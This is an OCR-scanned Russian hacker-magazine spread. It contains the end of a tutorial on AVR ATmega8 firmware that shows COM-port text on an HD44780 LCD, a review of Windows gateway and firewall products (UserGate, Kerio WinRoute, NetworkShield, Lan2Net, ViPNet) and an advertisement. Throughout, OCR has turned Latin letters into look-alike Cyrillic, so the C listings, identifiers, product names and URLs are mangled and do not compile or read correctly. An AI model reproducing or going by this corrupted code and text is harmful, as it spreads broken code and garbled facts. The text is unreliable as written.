#йеЕіпе НБ4478СЩБ5 РОКТ1 
#йеЕі.пе НБ4478СЩБ6 РОКТ2 
#ЭеЕіпс НО44780_Б7 РОКТЗ 

Тут мы определили тактовую частоту, на которой будет рабо- 
тать микроконтроллер, скорость ІІЗАВТ-порта и ноги, куда 
подключен дисплей. Все эти данныеты можешь отредакти- 

«РАЗРАБОТАЕМ 
И СОБЕРЕМ УСТРОЙСТВО 
С ТЕКСТОВЫМ ЮО-ДИС- 
ПЛЕЕМ, КОТОРОЕ БУДЕТ 
ВЫВОДИТЬ ПРОИЗ- 
ВОЛЬНЫЕ ДАННЫЕ, ПО- 
ЛУЧАЕМЫЕ С СОМ-ПОР- 
ТА КОМПЬЮТЕРА». 



ПОДКЛЮЧАЕМ І-СО-ДИСПЛЕЙ 

Что ж, давай уже сделаем что-то полезное! Разработаем 
и соберем устройство с текстовым ЮО-дисплеем, кото- 
рое будет выводить произвольные данные, получаемые с 
СОМ-порта компьютера. Я взял для этого микроконтроллер 
АТтеда8, ноты легко сможешьадаптировать код под любую 
АВРку, главное, чтобы количества выводов хватило. Схема 
получается достаточно простая. В меге8уже есть встро- 
енный ІІ5АВТ-порт. Чтобы подружить его с СОМ-портом 
компьютера, необходимо использовать конвертер уровней, 
например, старый добрый МАХ232. Издисплеевже можно 
выбрать любой на контроллере Н 044780 ; их существует 
огромное множество. Я взял ѴѴіп5І:аг ѴѴН2404, — у него 
две строки по 24 символа, есть поддержка кириллических 
букв, подсветка, да и стоитон недорого. Для подключения 
дисплея к микроконтроллеру я решил использовать семь 



ровать на своеусмотрение. Никогда не бойся эксперименти- 
ровать, именнотакобычно и учатся. Перейдем косновному 
модулю программы. Начинается он, какобычно, с подключе- 
ния заголовочныхфайлов: 

Подключение заголовочных файлов 

#іпс1ис!е "сіеііпез .А" 

#іпс1ис!е <аѵг/іо.Ъ> 

#іпс1ис1е <аѵг/іпЕеггирЦ . Ъ> 

#іпс1ис1е "М44780.А" 

Файл «беЛпез.Ь» подключается самым первым, так 
как следующие хедеры могут требовать соответс- 
твующие константы, например, Е_СР1). Далее идет 
«іо.Ь» — стандартный заголовочный файл для работы 



► юб 
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ЕСЛИ НАУЧИШЬСЯ РИСОВАТЬ СИМВОЛЫ, СМОЖЕШЬ ДЕЛАТЬ ЗАБАВНЫЕ АНИМАЦИИ. ЭТО — ПАКМЕН 




ВЫВОДИМ, ЧТО ИГРАЕТ В ВИНАМПЕ 



с АВР ка ми. Мы используем прерывания, поэтому подключаем и 
«іпІеггирІ.Ь». 

Хедер «6644780.6» нужен для работы с дисплеем. В нем описаны 
прототипы функций обмена данными с контроллером НО44780. 
Рекомендую изучить их самостоятельно; посмотри также файл 
«6644780. с», в котором описаны сами функции. Это и есть гото- 
вый модуль, о котором я писал выше. В статье нет места, чтобы 
рассказывать, как он работает, но на диске ты его найдешь. 
Открой дата шит по дисплею, сравни с функциями и пойми, как 
они устроены. 

Определим глобальные переменные: 

Определяем глобальные переменные 

ѵоІаСіІе сНаг ЬиТ[200] ; // Буфер 
ѵоІаСіІе іпЦ ЬиТзіге =0; // Длина строки 
ѵоіасііе сПаг геасіу =0; // Получена ли строка? 

Массив «ЬіЛ» — это буфер, куда складываем получаемую строку; 
«Ьігізіге» — длина строки (увеличиваем эту переменную с каждым полу- 
ченным байтом]. А «геа бу» — это просто флаг, который будет указывать, 
получена ли строка полностью. 

Но я не просто та к выбрал именно этот пример! Тут есть один 
хитрый момент. Обрати внимание на директиву «ѵоІаОІе». 
Сейчас я тебе расскажу про очень популярную ошибку среди 
новичков, чтобы ты ее не повторял. Дело в том, что у компиля- 
тора Си очень хитрый оптимизатор, но им надо уметь пользо- 
ваться. Если в коде встречается условие, которое ну никак не 
выполнится, по мнению компилятора, то оптимизатор легко 
может вырезать его из программы. Такое условие, например, 

— изменение переменной, которая не меняется в коде програм- 
мы. Но ведь эта глобальная переменная может изменяться по 
прерыванию! Вот директива «ѵоІаШе» и указывает именно на 
то, что переменная может непроизвольно изменяться внешни- 
ми силами. Далее я покажу пример именно такого кода. Опишем 
функцию-прерывание. 




ѴѴІЫАѴК ОТЛИЧНО РАБОТАЕТ В СОЧЕТАНИИ С АѴК 
5ТІЮІ0 

Обработчик прерывания 

ІЗК (Б8АКТ_КХС_ѵесЦ ) 

{ 

іпЦ Ь; 

Ь = ШЖ; // Получаем эти данные 

ІТ ( ( (Ь == 13) М (Ь == 10) ) 

&& (ЬиТзІ 2 е > 0) ) геасіу = 1; 

і! ( (Ь != 13) && (Ь != 10) 

&& (ЬиТзіге < зігеоі: (ЬиТ ) -1 ) ) 

ЬиТ [ЬиТзіге++ ] = Ь; 

} 

Здесьты уже должен все понимать. Получаем один байт данных. Если 
это не символ завершения строки, то заносим его в массив иувеличива- 
ем счетчикдлины строки; иначе пишем в переменную «геабу» единицу, 
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ДИСПЛЕЙ УЖЕ РАБОТАЕТ В СИМУЛЯТОРЕ ПРОСТЕЙШАЯ ПР0ВЕРКАИЗЛИНУКСА.ДА,«Л)ЕѴ/ 

ТТ5/0» — ЭТО СОМ-ПОРТ 



чтоуказываетосновной программе, что строка получена полностью. 
Перейдем к самому главному — функция «таіп», с которой начинается 
выполнение программы: 

Основная подпрограмма 

іпС таіп (ѵоісі) 

{ 

БСБ_іпІБ ( ) ; 

БЗАКТ_іпІБ ( ) ; 

вдМІе ( 1 ) 

{ 

ѵЩііІе (Ігеасіу); 

// Очищаем экран и возвращаем курсор 

М 447 80 _\гаіС_геас 1 у ( ) ; 

М 447 80 _оиБсшс 1 (НБ 447 80 _СБК) ; 

М 447 80 _ѵ\гаіС_геас 1 у ( ) ; 

Ь.сЗ .4 47 8 0 _оиСстс 1 (НБ 447 8 0 _НОМЕ ) ; 

М 447 80 _ѵ\гаіЦ_геас 1 у ( ) ; 

М 4 47 8 0 _оиБстс 1 (НБ 447 8 О _Б Б АББЕ ( 0 ) ) ; 

іпС і ; 

іог (і = 0 ; і < Ьиізіге; і + +) 

{ 

М 447 80 _маіБ_геас 1 у ( ) ; 

М 447 80 _оиБ(іаБа (Ъиі [і] ) ; 

} 

Ьиізіге = 0 ; 

геасіу = 0 ; 

} 

геБигп 0 ; 

} 

Сначала инициализация дисплея и ІІ5АРТ, — код этих функций смотри 
на диске. Далее по коду идет главный бесконечный цикл «ѵѵЫІе(1 )»; 
программа в микроконтроллере должна выполняться бесконечно, 
из нее нет выхода. Строка «геіигп 0» в конце только для того, чтобы 
компилятор не ругался; фактически она никогда не будет выполнена. 
Разберемся, чтожеу настак бесконечно выполняется. Строка «ѵѵбііе 
(Ігеасіу];» не делаетабсолютно ничего. Программа будет стоять на этом 
месте, пока «геасіу» равно нулю. Ты не забыл про наше прерывание? 
Именно оно изменит переменную, когда получит строку целиком. Если 
бы мы не использовали директиву «ѵоіабіе», то программа на этом 
месте просто зависала бы. В таком случае компилятор считает, что 
переменная «геасіу» не может измениться сама собой. Итак, строка по- 
лучена, и дальше никаких хитростей нет. Очищаем экран, возвращаем 



курсор и выводим текст. Обрати внимание, что перед каждой командой 
дисплею необходимо ожидать его готовности. Ну и в конце не забываем 
обнулить переменные. Прошивка готова! 

ФЬЮЗЫ 

Надеюсь, ты уже знаешь что такое «фьюзы» (ЕІІ5Е5]? Это два байта в 
специальной памяти АВРки, где хранятся настройки. Эти байты можно 
изменитьтолько с помощью программатора. 

В случае смегойЭуменя младший и старший фьюзы равны, соот- 
ветственно, 0хЕ4 и 0x09. Это значит, что у нас включены следующие 
конфигурационные биты: СК5ЕЕ0, С К5 Е И 1 , СКЭЕИЗ, 51Л0, 5РІЕІМ, 
ВООТ520, В00Т521 . Для их вычисления существует множество 
утилит, а их значения есть в даташите. Самое главное — это выбор 
тактовой частоты. В данном случае — 8 МГц со встроенным источни- 
ком синхронизации. 

ПРОВЕРЯЕМ 

Компилируем и прошиваем микроконтроллер получившейся про- 
шивкой. Подключаем готовое устройство к СОМ -порту компьютера. 
Очень надеюсь, что этот порт у тебя есть, иначе используй специ- 
альный РСІ или 115В контроллер (в качестве последнего можешь 
взять шнурок от мобильника]. 

Думаю, что с такими простыми задачами ты справишься. Запускай 
на компелюбой эмулятор терминала, настраивай его на соот- 
ветствующий порт и скорость; в моем случае это 9600 бод, один 
стоповый бит, проверки четности нет, контроля передачи данных 
тоже нет. Сделал? Набирай на клавиатуре произвольный текст, жми 
<Еп1;ег> — набранное будет выведено на дисплей. Полагаю, ты уже 
понял, какэто использовать. Например, в Ыпих достаточно прос- 
той команды вроде «есбо “Неііо ѵѵогіб!” > /беѵ/ііуБО» для вывода 
соответствующей надписи. Ты легко сможешь написать скрипт для 
отображения загрузки процессора, загруженности канала... да чего 
угодно! Только учти, что в примере реализуется работа только с 
первой строкой. А еще в этих дисплеях очень необычная кодировка, 
поэтому русский текст надо конвертировать. Доверяю тебе самому 
решитьэти проблемы. Наверняка, справишься. 

итог 

Цель статьи — дать понять, что если тызнаешьСи.но являешься 
полным чайником в микроконтроллерах, то тебе ничто не мешает уже 
сейчас легко писать простейшие программы. Я постарался препод- 
нести тебе основы и показать парочку примеров. Многие, вероятно, 
будут критиковать меня и говорить, что проще подключить дисплей к 
ЕРТ-порту. А что делать, если ЕРТ-порта на компе нет? Или если это 
вообще не компьютер? О том, как та кое возможно и зачем нужно, я 
расскажутебе в следующий раз.^С 
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СЕРГЕЙ «ѲРІЫйЕР» ЯРЕМЧУК 

/ бкшоЕкгазѵмАск.кі) / 

Привратник 
для локальной 
сети 

Обзор решений для выхода в интернет и защиты сети 

Подключение к интернету прибавляет забот любому админу. Раздача 
канала, обеспечение защиты внутренних ресурсов от внешних угроз, 
настройка учета трафика, контроль загрузки канала, блокировка доступа 
пользователей определенным сайтам и сервисам — это только верхуш- 
ка айсберга. Из великого многообразия доступных программных про- 
дуктов, позволяющих организовать работу пользователей в глобальной 
Сети, очень важно выбрать надежное и полнофункциональное решение. 



ЦБЕКбАТЕ РКОХѴ & РІКЕѴѴАІ_І_ 5.1 
РАЗРАБОТЧИК: ЕМТЕМ5Ѵ5 
ѴѴЕВ:ѴѴѴѴѴѴ.и5ЕК0АТЕ.Ки 
СИСТЕМНЫЕ ТРЕБОВАНИЯ: РЕМТШМ 1 ГГЦ, 

512 МБ ОЗУ 

ОС: ѴѴІ N 00ѴѴ5 2000/2003/ХР 

Предыдущая (четвертая) версия этого продук- 
та российской компании Ешепзуз называлась 
просто ИзегСаЕе и позиционировалась как прок- 
си-сервер с функциями фильтрации и учета тра- 
фика. Назначение версии 5.x видно из названия. 
Теперь возможности по фильтрации, блокировке 
и контролю трафика занимают на сайте практи- 
чески все описание. Доступ в Сеть обеспечивает- 
ся применением нескольких технологий — ИАТ, 
прозрачный прокси (НТТР, РТР, РОРЗ, 5МТР, 
50СК5) . Реализован также ѴоІР-шлюз (5ІР, Н323) 
для программных и аппаратных ІР-телефонов. 
Возможно подключение к интернет через другой 
прокси. При наличии нескольких подключений 
возможно распределение по ним пользователей 
и резервирование канала. Программа имеет 
встроенный ОНСР-сервер. Реализован БЫЗ-фор- 
вардинг. 

Администратор может задать максимальную 
скорость соединения, установить лимит на раз- 
мер скачиваемого файла, а также список разре- 
шенных приложений для каждого пользователя. 
Пользователь может быть авторизован по ІР-ад- 
ресу, ІР + МАС, ІР + МАС + логин, с помощью НТТР- 
авторизации или Асгіѵе ПігесГогу. Некоторые 
виды авторизации и контроль приложений пот- 
ребуют дополнительной установки на клиент- 



ском компьютере АшЬепгісагіоп СНепі, который 
находится в %и5ег§аГе%\ГооІ5 . Модуль ВапсІѵѵіскЬ 
Мапа§ег обеспечивает возможность резервиро- 
вать канал для определенного типа трафика. 
ІЛзегСаГе позволяет гибко управлять трафиком 
и его учетом (по времени и количеству). Можно 
задать несколько тарифов и привязать их к поль- 
зователям или группам, установить интервалы 
действия тарифов и трафик, который не должен 
попадать в статистику. 

Администратор может запретить посещать сай- 
ты определенного содержания, просто отобрав 
их среди 70 категорий. Возможна блокировка 
по ИКЬ и адресу, но это потребует значительных 
усилий. Анализ поля СоШеШ-Гуре в НТТР-запросе 
позволяет контролировать и при необходимости 
блокировать закачку файлов любых расшире- 
ний. Одна из главных особенностей ІІзегСаге — 
проверка трафика при помощи двух встроенных 
антивирусных модулей: Антивирус Касперского 
и Рапба Ашіѵігиз (лицензия на антивири при- 
обретается отдельно). Администратор может 
выбирать, что и каким антивирусом проверять, 
а также очередность проверки. Реализовано уда- 
ленное управление с помощью локализованной 
консоли администрирования. 

В версии 5.x появился новый модуль статистики, 
где в наглядной форме как администратор, так и 
пользователь могут получить любую информа- 
цию по трафику, в том числе и по продолжитель- 
ности ѴоІР-переговоров (естественно, пользо- 
ватель увидит только свои данные). Реализован 
экспортсобранныхданныхв М5 Ехсеі, ОрепОШсе . 
ог§ Саіс и НТМЬ. Программа имеет встроенный 



планировщик. Он может автоматизировать оп- 
ределенные задачи: запустить программу, обно- 
вить антивирусные базы, разослать статистику, 
установить или разорвать соединение. 

Установка продукта несложна: несколько раз на- 
жимаем «Далее», при необходимости отбираем 
отдельные компоненты. Консоль администри- 
рования тоже достаточно проста. Представляя 
конечный результат, можно разобраться в назна- 
чении элементов без подглядываний в прилагае- 
мое руководство (кстати, краткое, но понятное). 
Все сетевые подключения после установки можно 
найти в «Сервер ІІзегСаЕе -> Интерфейсы». Таккак 
это основная вкладка, на основе настроек которой 
будет считаться трафик, резервироваться канал, 
работать ЫАТ и всевозможные ограничения, то 
следует сюда зайти и указать тип соединения для 
каждого адаптера. Внешние сети должны иметь 
тип ѴѴАП, внутренние — ІАК Тип ѴРИ- и РРРоЕ- 
соединений изменить нельзя, они всегда установ- 
лены в РРР. 

Брандмауэр по умолчанию содержит только одно 
правило, причем разрешающее все соединения. 
С одной стороны это удобно, так как все работа- 
ет «из коробки». С другой — администратору 
придется некоторое время уделить настройке, 
чтобы защитить сеть. Начать, очевидно, следует 
с того, чтобы сделать это правило запрещающим, 
а затем уже разрешать действительно нужные 
соединения, заглядывая в логи. Правило йгеѵѵаіі 
создается при помощи пошагового мастера. Для 
этого надо указать название правила, источник и 
назначение (любой, хости ѴѴАІМ-интерфейс), сер- 
висы и действие (блокировать, разрешить, ПАТ) . 
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Созданное правило можно редактировать, удалить, переместить, отклю- 
чить, копировать, чтобы на его основе создать новое. Внутренние ресурсы 
компании, которые должны быть доступны «извне», необходимо публико- 
вать, создав для них правило доступа. 

В настройках отдельного пользователя указываются преобразования МАТ, 
правила управления трафиком, правила приложений, ограничение скоро- 
сти, номер 5ІР/Н323 телефона. 

Перейдя в пункт «Мониторинг», можно просмотреть в реальном времени 
активные сессии и при необходимости заблокировать некоторые из них. 
Администратор получит информацию по ІР-адресу компьютера, имени 
пользователя, точному количеству переданного и полученного трафика и 
по посещенным адресам. 



кизкоілЕі з з 

КизКоіИе (ѵ\члгѵу.гшгоиііе.ги) — маршрутизирующий файрвол, 
предназначенный для организации выхода в интернет с одного ІР. 
Обладает функциями защиты от сетевых атак, учета и ограничения 
трафика. Возможна активация действий по расписанию. КизКоійе 
также может использоваться как сервер ѴРЫ. Пользователи для входа 
в систему (порт 10000) используют логин и пароль либо клиентское 
приложение ККСНепБехе. Работает под управлением 32 и 64 битных 
версий ѴѴіпсІоѵѵз ХР/2003/Ѵізі:а/2008/5еѵеп. Довольно простая в 
управлении программа. А самое главное, что для русскоязычного 
домашнего пользователя и некоммерческих организаций ее можно 
использовать бесплатно и без ограничения времени действия ключа 
(предоставляется на 8 систем) . Для этого на странице «О программе» 
нужно ввести: «КК-0008-Гражданин бывшего СНГ » и проверить ключ, 
выбрав в контекстном меню «Ѵегііу кеу апсі §епегаі:е асгіѵайоп ^иезі». 
Если получено подтверждение «Кеу із ѵаіісі», на ошибку в активации 
можно не обращать внимания. 



Функциональность: 9/10 
Удобство управления: 8/10 
Работа с пользователями: 9/10 
Мониторинг и статистические отчеты: 8/10 

ЫЕТѴѴ0КК5НІЕІ.0 РІРЕѴѴАББ 2006 
РАЗРАБОТЧИК: МЕТ5ІВ 
ѴѴЕВ:ѴѴѴѴѴІ/.МЕТТОР?К5НІЕІ-0.РЦ 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: РЕМТІІІМ II ОТ 300 МГЦ, 256 МБ ОЗУ 
ОС: ѴѴІЫ00ѴѴ5 2000/ХР/2003 

№пѵогк8ЫеИ Рігеѵѵаіі 2006 создан на основе драйвера обработки сетевого 
трафика, поддерживающего технологию МАТ. Помимо обеспечения выхо- 
да в интернет через один канал, он позволяет управлять доступом между 
сетями и контролировать работу пользователей. Есть средства учета тра- 
фика. За безопасность отвечает файрвол, умеющий также определять и 
блокировать некоторые типы атак (5УЛ Поосі, ІР зроойп§) . Безопасность 
соединений гарантирует технология защиты под названием Абаргіѵе 
СоппесНопз Сошгоі (ЗіаІеітіІ Рігеѵѵаіі на основе логических объектов) . 
Установка продукта очень проста. После выбора русского языка жмем «Да- 
лее» и соглашаемся со всем, что предлагают. По окончании запустится «Мас- 
тер настройки сети». Его задача — произвести первоначальную настройку 
безопасности. Пока мастер не закончит работу, все исходящие соединения 
будут разрешены. Вначале вводим пароль админа и указываем интерфейс, 
к которому подключена локальная сеть, затем диапазон адресов, входящих в 
БАМ. Если БАИ-сетей несколько, их настройки указываем позднее, используя 
панель управления ЫЗР. Затем выбираем ѴѴАН-интерфейс, определяем сер- 
висы, к которым разрешен доступ из БАЛ (все или отдельные) . Наконец, оп- 
ределяем, ккаким сервисам на сервере ИЗБ разрешен доступ из ѴѴАК Кстати, 
не факт, что по окончании работы мастера все пользователи сразу получат 
доступ в Сеть. В этом N8? сильно отличается от ІІзегСаіе. 

Основные установки производятся в панели управления ЫЗЕ. Она лока- 
лизована, логична и построена стандартно для такого типа программ. На- 
строек меньше, чем в ІІзегСаіе, плюс большая их часть производится при 
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Антивирус Касперского 

НТТР-траФик 
РТР-трефик 
Почтовый трафик 

Настроит! Антивирус*! К«ісперского 
Антивирус: Выключен 

Обновить антивирусные базы ^ Р.іспис.іние 

Проверять НТТР-траФик 
Проверять РТР-траФик 
Проверять почту 
Проверять архивы 



Антивирус Рапсіа 

НТТР-траФик 
РТР-траФик 
Почтовый трафик 

Н«істроГік«! Антивируса Рапсіа 
Антивирус: 

Обновить антивирусные базы; 



’Ф 



Выключен 

Расписание 



Директория с 
обновлениями 
антивируса 

Адрес обновления: 



«по умолчанию» 



Ар: <ІоѵчпІоа<І$1.ка$р< 



Проверять НТТР-траФик 
Проверять РТР-траФик 
Проверять почту 
Проверять архивы 

Директория с 
обновлениями 



«по умолчанию» 



антивируса 



ІІ5ЕР6АТЕ ПОЗВОЛЯЕТ ПРОВЕРЯТЫРАФИК С ПОМОЩЬЮ ДВУХ АНТИВИРУСНЫХ ДВИЖКОВ 




> іпіо 

• 0 Кегіо ѴѴіпКоиІе 
Рігеѵѵаіі читай 
в статье «Марш-бро- 
сок в большую сеть», 
опубликованной 
в сентябрьском номе- 
ре □с за 2007 год. 

•У ШегСаІе есть 
встроенный 5ІР- 
сервер. 

•Особенность 
ѴѴіп Ргоху — наличие 
почтового сервера. 




> сіѵсі 

На прилагаемом 
кжурналу диске ты 
найдешь видеоролик, 
где показано, как 
установить и настро- 
ить ШегСаІе Ргоху & 
Рігеѵѵаіі 5.1 . 
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помощи пошаговых мастеров, поэтому конфигурировать N3? 
довольно легко. 

После работы мастера в «Правила йгеѵѵаіі» будет записано 
несколько рулесетов, разделенных на две группы: предопре- 
деленные и пользовательские. В предопределенных правилах 
можно изменять и отключать лишь некоторые параметры. 
Последним по списку установлено правило, запрещающее все 
соединения. Его изменить или отключить нельзя. 

При создании нового правила помогает пошаговый мастер. 
Админу предлагается ответить на ряд вопросов: название, 
тип (доступ или публикация), действие (разрешить, запре- 
тить), протокол (все или на выбор), источник и назначение. 
После создания правил а можно его отредактировать. Здесь 
же можно задать расписание. 

Для удобства настройки правил йгеѵѵаіі и правил учета тра- 
фика создаются объекты. Объектами могут быть компьюте- 
ры, диапазоны ІР, пользователи. Аутентификация пользова- 
телей возможна средствами ИЗР или ѴѴіпсІоѵѵз, в том числе, 
поддерживается и Асйѵе ЭігесГогу. На клиентских компью- 
терах дополнительно требуется установить клиент автори- 
зации (скачай его с расшаренной папки \\пз1\п5СІіепі:). Он 
позволяет использовать при подключении динамические 
ІР-адреса. 

Система квот и учета трафика предоставляет возможность 
задать лимит трафика (вкладка «Квоты трафика») за опреде- 
ленный период (день, неделя, и т.д.) и действие при его дости- 
жении (ничего не делать или заблокировать) . После создания 
квота подключается к объектам в «Правила учета трафика». 
Вкладка «Мониторинг» позволяет отслеживать в реальном 
времени активность объектов в сети. 

Функциональность: 8/10 
Удобство управления : 8/10 
Работа с пользователями: 9/10 
Мониторинг и статистические отчеты: 8/10 




В МЕТѴѴ0ВК5НІЕЮ РІРЕѴѴАИ ПРАВИЛА 
ПОМОГАЕТ СОЗДАВАТЬ ПОШАГОВЫЙ МАС- 
ТЕР 

І.АЫ2ЫЕТ ЫАТ РІКЕѴѴАи. 1 .99 
РАЗРАБОТЧИК: ООО «РОСТБИОХИМ» 

ѴѴЕ В : ѴѴѴѴѴѴ. І_АМ 2 N ЕТ. РІІ 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: РЕІЧТШМ II 0Т300 МГЦ, 256 
МБ ОЗУ 

ОС:ѴѴІІ\ЮОѴѴ32000/2003/ХР 

Этот продукт разработан специально для применения в не- 
больших офисах, где необходимо обеспечить безопасный 
доступ в интернет без привлечения специалистов. Для этого 
есть все необходимое: ИАТ, перенаправление соединений 
для доступа к внутренним сервисам «извне», ЭИЗ Рогѵѵагйег. 
Защита обеспечивается файрволом сетевого уровня. Имеется 
возможность ручного создания белого и черного списка веб- 
адресов, куда можно прописывать ШИ, домен и поддомен, а 
также расширения файлов (к счастью, при составлении таких 
правил разрешается использование символов подстановки ? 
и *) . Реализована система учета трафика с установлением ин- 
дивидуальных квот. При перерасходе возможна блокировка 
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ОСОБЕННОСТЬ ВІІ5В01ІТЕ — ВСТРОЕННЫЙ ѴРЫ- 
СЕРВЕР 







ЖУРНАЛ РЕГИСТРАЦИИ ІР ПАКЕТОВ ВѴІРЫЕТ 

РІРЕѴѴАИ 



доступа пользователя в интернет с предоставлением только необходимых 
для работы ресурсов (почта, корпоративный веб-сайт). Предусмотрено 
несколько вариантов аутентификации: ШЪМ, ѴѴіпсІоѵѵз, логин/пароль, 
ІР, МАС, ІР+МАС, диапазон ІР, с помощью клиента Ьап2пеі: Ьо§іп Сііепі: и 
без аутентификации. Для удобства управления и создания правил досту- 
па пользователи объединяются в группы. При этом учетную запись очень 
просто перенести в другую группу. Достаточно захватить имя и перетащить 
мышкой на новое место. Средствами Ьап2пеі: легко создать группы, кото- 
рымразрешен, например, доступ только кпочте или веб-сервисам. Инстал- 



О [^МУЛЬТ И МЕДИЙНОЙ 



журналистики 

ѵѵѵѵѵѵ.тиІНщг.ги 



Дорогие друзья! 

Медиакомпания Сатеіапб (25 журналов, 15 сайтов, 2 телеканала) объявляет об открытии Школы мультимедийной журналистики 
для желающих максимально быстро (за 6 месяцев) овладеть увлекательным ремеслом, позволяющим хорошо зарабатывать! 

Мы научим вас создавать материалы для журналов и газет, профессионально фотографировать, снимать телевизионные 
сюжеты, писать тексты для сайтов и поделимся разнообразными секретами журналистского мастерства. Гарантируется практика 
в СМИ Медиакомпании Сатеіапсі (подробнее обо всех проектах - на сайте ѵѵѵѵѵѵ.діс.ги) , после прохождения курса возможно 
трудоустройство в нашем холдинге. 

Занятия - в офисе в центре Москвы (ул. Льва Толстого-18, напротив музея-усадьбы Толстого; метро «Парк культуры»). 




Стоимость обучения в Школе составляет 5 000 рублей в месяц. Срок обучения - 6 месяцев. 

Подробнее об условиях приема в Школу мультимедийной журналистики при Сатеіапсі о сроках подачи документов и видах обучения можно узнать на сайте 
ѵѵѵѵѵѵ.тиііциг.ги, отправив запрос по адресу ророѵ@датеІапсі.ги или гуа5коѵа@датеІапсІ.ги, и по телефонам +7 926 091 41 71, +7 926 249 86 75. 

Ждем вас, уважаемые будущие коллеги! 



МУЛЬТИМЕДИЙНАЯ ЖУРНАЛИСТИКА - ЭТО ПРАКТИЧНО И ПЕРСПЕКТИВНО! 
МЫ ЗНАЕМ 0 НЕЙ ВСЕ И НАУЧИМ ВАС! 







>> 5ѴМ/АСК 




ПОЧТОВЫЙ СЕРВЕР ѴѴІЫРВОХѴ ПОЗВОЛЯЕТ ОТПРАВЛЯТЬ Е-МАИ. И СОБИРАТЬ 
ПОЧТУСНЕСКОЛЬКИХЯЩИКОВ 



ляция продукта тривиальна. Сразу после ее окончания будет предложено 
войти в консоль; здесь же предлагается сменить пароль администратора 
(по умолчанию он пустой). После установки Ьап2пеі: находится в режиме 
настройки, при котором йгеѵѵаіі отключен, и все пакеты проходят без филь- 
трации. Мастер быстрой настройки, появляющийся при первом запуске 
консоли, поможет быстро сформировать нужные правила. Здесь всего не- 
сколько шагов — выбор конфигурации (сервер, клиентский комп); далее 
указываем ѴѴАЛ- и ЬАІЧ-интерфейсы, ИАТ уже включен. После завершения 
работы мастера разрешены любые соединения из ЬАМ, и блокируются все 
подключения из внешней сети. Если присутствует несколько ЬАЛ-интер- 
фейсов, их затем следует добавлять в консоли, во вкладке «Интерфейсы». 
Следует помнить, что правила йгеѵѵаіі разбиты на две группы. Правила, 
настраиваемые в разделе «Правила Рігеѵѵаіі», имеют более высокий при- 
оритет перед настройками в правилах пользователей. Поэтому общие 
блокировки и контроль определенного типа трафика (веб, почта и т.п.) 
прописываем в «Правила Рігеѵѵаіі», а персональные — в «Г руппы и правила 
пользователей», которые обрабатываются в том случае, если не сработали 
первые . Все настройки в Ьап2пеі: производятся при помощи мастеров, поэ- 
тому разобраться будет нетрудно. 

Вкладка «Мониторинг» позволяет просматривать текущие соединения. 
Здесь же, используя контекстное меню, можно на основе определенного 
события создать правило йгеѵѵаіі. В отдельной вкладке доступен журнал 
логов, где можно сформировать отчет по любому событию. Для просмотра 
статистики (админом и пользователями) Ьап2пеі: имеет встроенный веб- 
сервер. 

Функциональность: 7/10 

Удобство управления : 8/10 

Работа с пользователями: 9/10 

Мониторинг и статистические отчеты: 8/10 

ѴІРЫЕТ ОРРІСЕ РІКЕѴУАУ. 3.1 
РАЗРАБОТЧИК: ОАО «ИНФОТЕКС» 

ѴѴЕВ: ѴѴѴѴѴѴ.ІМР0ТЕС5.РІІ 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: РЕМТЮМ III ОТ 500 МГЦ, 512 МБ ОЗУ 
ОС: ѴѴІ N 00ѴѴ5 2000/ХР/2003/ѴІ5ТА/2008, ЕСТЬ ІЛМІІХ-ВЕРСИЯ 



Продукт от ИнфоТеКС позиционируется как файрвол, предназначенный 
для защиты сетей небольших и средних компаний. Подключение клиентов 
к интернету реализуется путем динамического ЫАТ. Статическая транс- 
ляция сетевых адресов позволяет публиковать во внешней сети внутрен- 
ние сервера. Продукт работает с любым количеством сетевых адаптеров 
и поддерживает различные методы подключения к Сети. Предусмотрена 
возможность назначить для каждого сетевого интерфейса диапазон допус- 
тимых ІР-адресов . Это позволяет блокировать системы с адресами из другой 
зоны (анти-спуфинг). Учитывая, что никаких других возможностей по ау- 
тентификации отдельного пользователя нет, эта функция лишней не будет. 
Кроме того, каждый адаптер может устанавливаться в один из пяти режимов 
безопасности. Так, первый режим блокирует, а пятый разрешает весь ІР-тра- 
фик. Режим 4 действует на локальные соединения, разрешая весь трафик. Эти 
режимы не являются рабочими и рекомендуются только на период тестиро- 
вания. При обычной эксплуатации обычно задействуются второй и третий 
режим. Режим 2 установлен по умолчанию и блокирует все соединения, кро- 
ме явно разрешенных в правилах. В режиме 3 файрвол пропускает исходящие 
соединения, кроме явно запрещенных, и блокирует входящие соединения. 
Наиболее оптимальным является установка внешнего адаптера в режим 
2 (или 3), внутреннего — в режим 3 (2, иногда 4), а затем донастройка под 
конкретную задачу, если текущих установок будет недостаточно. Настрой- 
ки сетевых фильтров можно активировать по расписанию, что, несомненно, 
упростит жизнь админу (например, можно отключить на ночь все ненужные 
соединения) . Система обнаружения атак (ЮЗ) распознаети блокируетнаибо- 
лее распространенные сетевые атаки (ѴѴіпЛике, Ьаш1, ТеаМгор, 5зрш§, Теаг2, 
ИеѵѵТеаг, Вопк, Воіпк, ПезЫЛпгеасЬ, ЕГОР Йоосі, Ріп§ Йооб, ООВпике и т.д.) во 
входящем и исходящем потоке (активируется дополнительно) . 

ѴіРЫеі; ОР осуществляет обработку прикладных протоколов РТР, НТТР и 5ІР. 
При необходимости администратор может уточнить этот список. При ра- 
боте на локальной системе контролируются и приложения, требующие до- 
ступа в Сеть. При попытке соединиться с удаленным узлом администратор 
получает уведомление, в котором можно разрешить или запретить работу 
ссетью указанному приложению. Функция веб-фильтрации позволяет бло- 
кировать баннеры, интерактивные элементы веб-страниц, а также КеГеггег 
и Соокіе, позволяющие отследить действия пользователя в интернете. 

Еще одна особенность — возможность создания нескольких конфигураций 



► іі4 
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и быстрого переключения между ними. Реализована простая статис- 
тика по пропущенным и блокированным ІР-пакетам и журнал ІР-па- 
кетов. Последний позволяет отобрать, основываясь на различных кри- 
териях, и просмотреть подробности событий. Результат затем можно 
экспортировать в НТМБ или Ехсеі. К сожалению, возможностей по 
учету трафика нет. Интерфейс консоли управления интуитивно поня- 
тен. Доступны следующие пункты: Сетевые фильтры, Сетевые интер- 
фейсы, Трансляция адресов, Блокированные ІР-пакеты, Статистика, 
Обнаружение атак, Журнал ІР-пакетов, Конфигурация. 
Заблокированные пакеты отображаются в одноименном окне. Ис- 
пользуя эту информацию из контекстного меню, можно создать но- 
вое правило доступа или фильтр протоколов. При ручном создании 
правила в окне «Сетевые фильтры» следует указать ІР-адреса и интер- 
фейсы. После создания правила можно добавить к нему фильтр про- 
